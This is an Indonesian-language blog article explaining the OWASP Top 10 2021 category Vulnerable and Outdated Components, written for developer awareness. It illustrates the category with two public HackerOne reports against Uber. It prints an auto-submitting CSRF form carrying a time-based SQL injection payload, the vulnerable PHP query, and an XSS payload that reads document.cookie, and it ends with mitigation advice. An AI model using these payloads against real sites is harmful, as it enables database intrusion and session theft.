Pengantar
Artikel kali ini kita akan membahas owasp top 10 yang ada di urutan ke enam untuk tahun 2021 (owasp tiap 4 tahun sekali), ialah Vulnerable and Outdated Components.
OWASP merupakan singkatan dari Open Web Application Security Project, yang merupakan sebuah project Security Web Application open source yang diperkasai oleh para penggiat teknologi atau pengembang aplikasi, OWASP sering mengadakan seminar, forum diskusi serta pendidikan untuk para Developer.
jadi yang dimaksud OWASP TOP 10? owasp top 10 merupakan sebuah cara untuk mengkategorikan resiko kerentanan yang sering terjadi pada sebuah aplikasi berbasis website, dari yang paling atas (resiko tertinggi) hingga yang paling bawah (tingkat resiko rendah), Tujuannya apa ?, tentu saja ini sangat berguna bagi para developer aplikasi supaya mereka jadi lebih aware terhadap kerentanan di aplikasi mereka.
Vulnerable and Outdated Components
apa itu Vulnerable and Outdated Components ?
Vulnerable and Outdated Components Merupakan sebuah kesalahan dari developer aplikasi yang memakai Framework / Library pihak ketiga tetapi masih versi lawas (Outdated), karena biasanya versi Outdate itu sangat rentan terhadadp serangan.
Ironisnya Vulnerable and Outdated Components ini sering terjadi di Indonesia :’(, apalagi situs situs yang tidak di maintenance dengan baik dan terbengkalai sehingga attacker dapat menggunakan kerentanan aplikasi itu.
Praktikal
#135288 Multiple vulnerabilities in a WordPress plugin at drive.uber.com
sumber : https://hackerone.com/reports/135288
attacker melakukan scanning di website drive.uber.com dan menemukan bahwa aplikasi tersebut masih menggunakan WordPress 4.4.2 (versi lawas).
dari WordPress 4.4.2* ditemukan beberapa kerentanan seperti :
- SQL INJECTION
attacker membuat sebuah halaman seperti berikut
<form action="https://drive.uber.com/ukmarketplace/wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder" target="_blank" method="post" style="display: none;">
<input type="text" name="btnOrderPages" value="Click to Reorder FAQs" />
<input type="text" name="hdnfaqpageorder" value="id_8,id_7" />
<input type="text" name="hdnParentID" value="IF(MID(VERSION(),1,1) = 5, SLEEP(5), 0)" />
<input type="text" name="btnReturnParent" value="1" />
<input type="submit" name="send" value="Save" />
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
POST di plugins/q-and-a/inc/reorder.php
if (isset($_POST['btnReturnParent'])) {
$parentsParent = $wpdb->get_row("SELECT post_parent FROM $wpdb->posts WHERE ID = " . $_POST['hdnParentID'], ARRAY_N);
$parentID = $parentsParent[0];
}
- Cross-Site Scripting (XSS)
Attacker Login ke admin panel -> Settings -> Q & A
ganti FAQ Homepage :
'"/autofocus/onfocus=alert(document.domain%2bdocument.cookie);//
#168485 Exposed, outdated nginx server (v1.4.6) potentially vulnerable to heap-based buffer overflow & RCE
sumber : https://hackerone.com/reports/168485
attacker melakukan recon do ip address 54.153.101.52 dan mendapati bahwa masih menggunakan nginx version 1.4.6
CVE diatas terdapat kerentanan RCE
Mitigasi
Segera lakukan pengecekan berkala di aplikasi yang anda gunakan, jika memang memakai pihak ketiga (Framework) dari developer lain. usahakan selalu memakai versi yang paling update untuk meredam resiku peretasan.
References
OWASP Application Security Verification Standard: V1 Architecture, design and threat modelling
OWASP Dependency Check (for Java and .NET libraries)
OWASP Testing Guide - Map Application Architecture (OTG-INFO-010)
OWASP Virtual Patching Best Practices
The Unfortunate Reality of Insecure Libraries
MITRE Common Vulnerabilities and Exposures (CVE) search
National Vulnerability Database (NVD)
Retire.js for detecting known vulnerable JavaScript libraries
Node Libraries Security Advisories
Ruby Libraries Security Advisory Database and Tools
https://safecode.org/publication/SAFECode_Software_Integrity_Controls0610.pdf
Beberapa kerentanan lain di list CWE
CWE-937 OWASP Top 10 2013: Using Components with Known Vulnerabilities
CWE-1035 2017 Top 10 A9: Using Components with Known Vulnerabilities
CWE-1104 Use of Unmaintained Third Party Components
Posting Komentar